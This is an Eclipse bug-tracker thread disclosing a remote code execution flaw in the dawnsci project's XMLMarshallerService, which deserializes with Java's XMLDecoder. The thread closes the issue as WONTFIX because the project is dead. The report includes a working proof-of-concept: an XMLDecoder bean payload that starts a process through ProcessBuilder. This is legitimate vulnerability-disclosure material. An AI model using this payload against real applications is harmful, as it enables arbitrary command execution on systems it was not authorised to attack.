Community
Participate
Working Groups
From the Security Team inbox: -- https://github.com/eclipse/dawnsci/blob/master/org.eclipse.dawnsci.remotedataset.core/src/org/eclipse/dawnsci/remotedataset/XMLMarshallerService.java uses insecure XMLDecoder to unmarshall xml files leading to remote code execution (RCE). For example below sample code should popup calculator. //https://github.com/pwntester/XMLDecoder/blob/master/bean-rce.xml String xml = " <object class=\"java.lang.ProcessBuilder\">\r\n" + " <array class=\"java.lang.String\" length=\"1\">\r\n" + " <void index=\"0\">\r\n" + " <string>calc</string>\r\n" + " </void>\r\n" + " </array>\r\n" + " <void method=\"start\" />\r\n" + " </object>\r\n" ; XMLMarshallerService x = new XMLMarshallerService(); byte[] b = xml.getBytes(); Map<String, Object> m = (Map<String, Object>) x.unmarshal(xml, Map.class); It looks like the unmarshall code is called at https://github.com/eclipse/dawnsci/blob/master/org.eclipse.dawnsci.remotedataset.client/src/org/eclipse/dawnsci/remotedataset/client/RemoteDataHolder.java and potentially downloading the xml file from remote service increasing the risk. --
Project team: there is some help in the handbook regarding how we handle vulnerabilities. https://www.eclipse.org/projects/handbook/#vulnerability
Matthew, can you or somebody from the project team respond please?
Housekeeping. We're well past the three month disclosure deadline, so I'm removing the confidential flag.
Based on [1], the project is dead. WONTFIX. [1] https://www.eclipse.org/lists/dawnsci-dev/msg00005.html